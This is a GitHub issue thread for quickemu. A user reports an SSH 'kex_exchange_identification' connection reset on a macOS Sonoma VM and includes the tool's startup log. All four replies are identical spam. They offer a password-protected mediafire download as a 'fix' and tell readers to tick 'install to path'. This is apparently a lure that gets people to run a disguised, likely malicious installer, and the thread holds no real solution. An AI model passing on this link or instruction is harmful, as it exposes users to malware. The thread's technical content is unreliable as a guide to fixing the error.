### ISSUE TITLE
 kex_exchange_identification: read: Connection reset by peer

### ISSUE THREAD

**Issue by marcelodelta** [quickemu-project/quickemu#1444]
I'm having this error when trying to connect to the VM. Would anyone know where I'm going wrong?

 kex_exchange_identification: read: Connection reset by peer

Quickemu 4.9.6 using /usr/bin/qemu-system-x86_64 v9.0.2
 - Host:     Manjaro Linux running Linux 6.10.5-1-MANJARO Delta-Laptop
 - CPU:      12th Gen Intel(R) Core(TM) i5-12450H 
 - CPU VM:   host, 1 Socket(s), 2 Core(s), 2 Thread(s)
 - MSR:      WARNING! Ignoring unhandled Model-Specific Registers is disabled.

             echo 1 | sudo tee /sys/module/kvm/parameters/ignore_msrs

             If you are unable to run macOS or Windows VMs then run the above 👆
             This will enable ignoring of unhandled MSRs until you reboot the host.
             You can make this change permanent by running: 'quickemu --ignore-msrs-always'
 - RAM VM:   8G RAM
 - BOOT:     EFI (macOS), OVMF (OVMF_CODE.fd), SecureBoot (off).
 - Disk:     macos-sonoma/disk.qcow2 (128G)
             Just created, booting from macos-sonoma/RecoveryImage.img
 - Recovery: macos-sonoma/RecoveryImage.img
 - Display:  SDL, VGA, GL (on), VirGL (off) @ (1280 x 800)
 - Sound:    intel-hda (hda-micro)
 - ssh:      On host:  ssh user@localhost -p 22220
 - 9P:       On guest: sudo mount_9p Public-marcelo
 - 9P:       On host:  chmod 777 /home/marcelo/Público
             Required for macOS integration 👆
 - smbd:     On guest: smb://10.0.2.4/qemu
 - Network:  User (virtio-net)
 - Monitor:  On host:  socat -,echo=0,icanon=0 unix-connect:macos-sonoma/macos-sonoma-monitor.socket
 - Serial:   On host:  socat -,echo=0,icanon=0 unix-connect:macos-sonoma/macos-sonoma-serial.socket
 - Process:  Started macos-sonoma.conf as macos-sonoma (16057)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
